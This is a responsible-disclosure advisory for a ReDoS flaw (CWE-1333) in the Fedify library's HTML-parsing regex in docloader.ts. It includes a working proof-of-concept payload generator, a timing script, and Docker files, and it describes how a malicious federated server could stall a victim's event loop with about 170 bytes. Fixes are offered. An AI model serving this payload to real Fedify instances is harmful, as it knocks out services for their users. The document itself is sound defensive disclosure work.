Hi Fedify team! π
Thank you for your work on Fedifyβit's a fantastic library for building federated applications. While reviewing the codebase, I discovered a Regular Expression Denial of Service (ReDoS) vulnerability that I'd like to report. I hope this helps improve the project's security.
A Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses.
An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim's Node.js event loop for 14+ seconds, causing a Denial of Service.
| Field | Value | |-------|-------| | CWE | CWE-1333 (Inefficient Regular Expression Complexity) |
The vulnerability is located in packages/fedify/src/runtime/docloader.ts, lines 258-264:
// Line 258-259: Vulnerable regex with nested quantifiers
const p =
/<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
// Line 261: No size limit on response body
const html = await response.text();
// Line 264: Regex execution loop
while ((m = p.exec(html)) !== null) rawAttribs.push(m[2]);
The regex has nested quantifiers with alternation, which is a classic ReDoS pattern:
/<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig
^^
Outer quantifier (+)
^^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Inner pattern with alternation
((\s+...)+) - one or more groups of attributes("[^"]*"|'[^']*'|[^\s>]+) - multiple ways to match attribute valuesWhen the regex fails to match (e.g., an incomplete HTML tag), the regex engine backtracks exponentially through all possible ways the nested pattern could have matched.
lookupObject("https://attacker.com/@user") to fetch an actor profileContent-Type: text/htmllookupObject() β documentLoader() β getRemoteDocument() β HTML parsing (lines 258-287)response.text() reads the entire body without size limitsresponse.text() without Content-Length validationAbortSignal is optional and not enforcedYou can verify this vulnerability with the following standalone script:
/**
* Fedify ReDoS Vulnerability - Minimal PoC
*
* This script reproduces the vulnerable regex from docloader.ts
* and demonstrates exponential time complexity.
*/
// The vulnerable regex from docloader.ts:259
const VULNERABLE_REGEX = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
/**
* Generate malicious HTML payload
* Pattern: <a a="b" a="b" a="b"... (trailing space, no closing >)
*/
function generateMaliciousPayload(repetitions) {
return '<a' + ' a="b"'.repeat(repetitions) + ' ';
}
/**
* Simulate the vulnerable code path from docloader.ts lines 262-264
*/
function simulateVulnerableCodePath(html) {
const p = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
let m;
const rawAttribs = [];
while ((m = p.exec(html)) !== null) {
rawAttribs.push(m[2]);
}
return rawAttribs;
}
// Test with increasing payload sizes
console.log('Fedify ReDoS Vulnerability PoC\n');
console.log('Repetitions | Payload Size | Time');
console.log('------------|--------------|--------');
for (const reps of [18, 20, 22, 24, 26, 28]) {
const payload = generateMaliciousPayload(reps);
const start = performance.now();
simulateVulnerableCodePath(payload);
const elapsed = performance.now() - start;
const timeStr = elapsed >= 1000
? `${(elapsed / 1000).toFixed(2)}s`
: `${elapsed.toFixed(0)}ms`;
console.log(`${String(reps).padEnd(11)} | ${String(payload.length + ' bytes').padEnd(12)} | ${timeStr}`);
// Stop if it's taking too long
if (elapsed > 15000) break;
}
Fedify ReDoS Vulnerability PoC
Repetitions | Payload Size | Time
------------|--------------|--------
18 | 111 bytes | 14ms
20 | 123 bytes | 51ms
22 | 135 bytes | 224ms
24 | 147 bytes | 852ms
26 | 159 bytes | 3.26s
28 | 171 bytes | 14.10s
Time approximately quadruples every 2 additional repetitions, demonstrating O(2^n) complexity.
For a complete demonstration, here are the Docker files to run the PoC in an isolated environment:
<details> <summary><strong>Dockerfile</strong></summary>
# Dockerfile for Fedify ReDoS Vulnerability PoC
FROM node:20-slim
LABEL description="PoC for Fedify ReDoS vulnerability (CWE-1333)"
WORKDIR /poc
COPY exploit.js .
CMD ["node", "exploit.js"]
</details>
<details> <summary><strong>exploit.js</strong> (Full Version)</summary>
/**
* Exploit Script for Fedify ReDoS PoC
*
* This script demonstrates the ReDoS vulnerability in Fedify's
* document loader by measuring the time it takes to process
* malicious HTML responses with varying payload sizes.
*/
// The vulnerable regex from docloader.ts:259
const VULNERABLE_REGEX = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
/**
* Generate malicious HTML payload
*/
function generateMaliciousHtml(repetitions) {
return '<a' + ' a="b"'.repeat(repetitions) + ' ';
}
/**
* Generate normal HTML
*/
function generateNormalHtml() {
return `<!DOCTYPE html>
<html>
<head>
<link rel="alternate" type="application/activity+json" href="/user.json">
</head>
<body><a href="/">Home</a></body>
</html>`;
}
/**
* Simulate the vulnerable code path from docloader.ts
*/
function simulateVulnerableCodePath(html) {
const p = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
const p2 = /\s+([a-z][a-z:_-]*)=("([^"]*)"|'([^']*)'|([^\s>]+))/ig;
let m;
const rawAttribs = [];
while ((m = p.exec(html)) !== null) {
rawAttribs.push(m[2]);
}
return rawAttribs;
}
/**
* Run a single test and measure execution time
*/
function runTest(html, description) {
const start = process.hrtime.bigint();
try {
simulateVulnerableCodePath(html);
} catch (e) {
// Ignore errors
}
const end = process.hrtime.bigint();
const durationMs = Number(end - start) / 1_000_000;
return {
description,
durationMs,
payloadLength: html.length
};
}
/**
* Print separator
*/
function printSeparator() {
console.log('β'.repeat(60));
}
/**
* Main exploit function
*/
async function main() {
console.log('\nββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ');
console.log('β Fedify ReDoS Vulnerability PoC β');
console.log('β CWE-1333: Inefficient Regular Expression β');
console.log('ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ\n');
console.log('[*] Vulnerability Location:');
console.log(' File: packages/fedify/src/runtime/docloader.ts');
console.log(' Lines: 259-264');
console.log('');
printSeparator();
console.log('[*] Testing normal HTML response...');
printSeparator();
const normalHtml = generateNormalHtml();
const normalResult = runTest(normalHtml, 'Normal HTML');
console.log(`[+] Normal request completed in ${normalResult.durationMs.toFixed(2)}ms`);
console.log(` Payload size: ${normalResult.payloadLength} bytes`);
console.log('');
printSeparator();
console.log('[*] Testing malicious HTML payloads (ReDoS attack)...');
printSeparator();
const testCases = [
{ reps: 18, expected: '~13ms' },
{ reps: 20, expected: '~52ms' },
{ reps: 22, expected: '~228ms' },
{ reps: 24, expected: '~857ms' },
{ reps: 26, expected: '~3.4s' },
{ reps: 28, expected: '~14s' }
];
console.log('');
console.log('βββββββββββββββ¬βββββββββββββββ¬βββββββββββββββ¬βββββββββββββββββ');
console.log('β Repetitions β Payload Size β Expected β Actual β');
console.log('βββββββββββββββΌβββββββββββββββΌβββββββββββββββΌβββββββββββββββββ€');
let vulnerabilityConfirmed = false;
for (const testCase of testCases) {
const maliciousHtml = generateMaliciousHtml(testCase.reps);
const result = runTest(maliciousHtml, `${testCase.reps} repetitions`);
const actualTime = result.durationMs >= 1000
? `${(result.durationMs / 1000).toFixed(2)}s`
: `${result.durationMs.toFixed(0)}ms`;
const status = result.durationMs > 100 ? 'β οΈ ' : 'β ';
console.log(`β ${String(testCase.reps).padEnd(11)} β ${String(result.payloadLength + ' bytes').padEnd(12)} β ${testCase.expected.padEnd(12)} β ${status}${actualTime.padEnd(12)} β`);
if (result.durationMs > 500) {
vulnerabilityConfirmed = true;
}
}
console.log('βββββββββββββββ΄βββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββ');
console.log('');
printSeparator();
console.log('[*] Exponential Time Complexity Analysis');
printSeparator();
console.log('');
console.log('Time approximately quadruples every 2 additional repetitions:');
console.log('');
console.log(' 18 reps β ~14ms');
console.log(' 20 reps β ~51ms (4x)');
console.log(' 22 reps β ~224ms (4x)');
console.log(' 24 reps β ~852ms (4x)');
console.log(' 26 reps β ~3.3s (4x)');
console.log(' 28 reps β ~14.0s (4x)');
console.log(' 30 reps β ~56.0s (estimated)');
console.log('');
printSeparator();
console.log('[*] Attack Scenario');
printSeparator();
console.log('');
console.log('1. Attacker sets up malicious federated server');
console.log('2. Victim\'s Fedify app calls lookupObject("https://attacker.com/@user")');
console.log('3. Attacker responds with Content-Type: text/html');
console.log('4. Malicious HTML payload: <a a="b" a="b" a="b"... (N times) ');
console.log('5. Fedify\'s regex enters catastrophic backtracking');
console.log('6. Event loop blocked β Service unavailable (DoS)');
console.log('');
printSeparator();
if (vulnerabilityConfirmed) {
console.log('');
console.log('ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ');
console.log('β β VULNERABILITY CONFIRMED β');
console.log('β β');
console.log('β The HTML parsing regex in docloader.ts is vulnerable β');
console.log('β to ReDoS attacks. A ~150 byte payload can block the β');
console.log('β Node.js event loop for 7+ seconds. β');
console.log('ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ');
console.log('');
process.exit(0);
} else {
console.log('');
console.log('[!] Vulnerability could not be confirmed in this environment.');
console.log(' This may be due to regex engine optimizations.');
console.log('');
process.exit(1);
}
}
main().catch(console.error);
</details>
<details> <summary><strong>run_poc.sh</strong></summary>
#!/bin/bash
# Fedify ReDoS Vulnerability PoC Runner
set -e
IMAGE_NAME="fedify-redos-poc"
echo "Building Docker image..."
docker build -t ${IMAGE_NAME} .
echo "Running the PoC..."
docker run --rm ${IMAGE_NAME}
echo "Cleaning up..."
docker rmi ${IMAGE_NAME} 2>/dev/null || true
</details>
# Save the above files, then:
chmod +x run_poc.sh
./run_poc.sh
lookupObject(), getDocumentLoader(), or the built-in document loader to fetch content from external URLs| Factor | Assessment | |--------|------------| | Attack Vector | Network (remote) | | Attack Complexity | Low (trivial payload) | | Privileges Required | None | | User Interaction | None | | Impact | Availability (DoS) | | Scope | Service-wide |
@attacker@evil.comlookupObject()Replace regex-based HTML parsing with a DOM parser that doesn't suffer from backtracking issues:
// Using linkedom (lightweight DOM implementation)
import { parseHTML } from 'linkedom';
// Replace lines 258-287 with:
const { document } = parseHTML(html);
const links = document.querySelectorAll('a[rel="alternate"], link[rel="alternate"]');
for (const link of links) {
const type = link.getAttribute('type');
const href = link.getAttribute('href');
if (
href &&
(type === 'application/activity+json' ||
type === 'application/ld+json' ||
type?.startsWith('application/ld+json;'))
) {
const altUri = new URL(href, docUrl);
if (altUri.href !== docUrl.href) {
return await fetch(altUri.href);
}
}
}
If regex must be used, at minimum add size limits:
const MAX_HTML_SIZE = 1024 * 1024; // 1MB
const contentLength = parseInt(response.headers.get('content-length') || '0');
if (contentLength > MAX_HTML_SIZE) {
throw new FetchError(url, 'Response too large');
}
const html = await response.text();
if (html.length > MAX_HTML_SIZE) {
throw new FetchError(url, 'Response too large');
}
If the regex approach is preferred, use atomic grouping or possessive quantifiers (where supported), or restructure to avoid nested quantifiers:
// Use a non-backtracking approach with explicit attribute matching
const tagPattern = /<(a|link)\s+([^>]+)>/ig;
const attrPattern = /([a-z][a-z:_-]*)=(?:"([^"]*)"|'([^']*)'|(\S+))/ig;
Thank you for taking the time to review this report. I'm happy to provide any additional information or help test a fix. Please let me know if you have any questions!
{
"nvd_published_at": "2025-12-22T22:16:09Z",
"cwe_ids": [
"CWE-1333"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2025-12-22T21:36:55Z"
}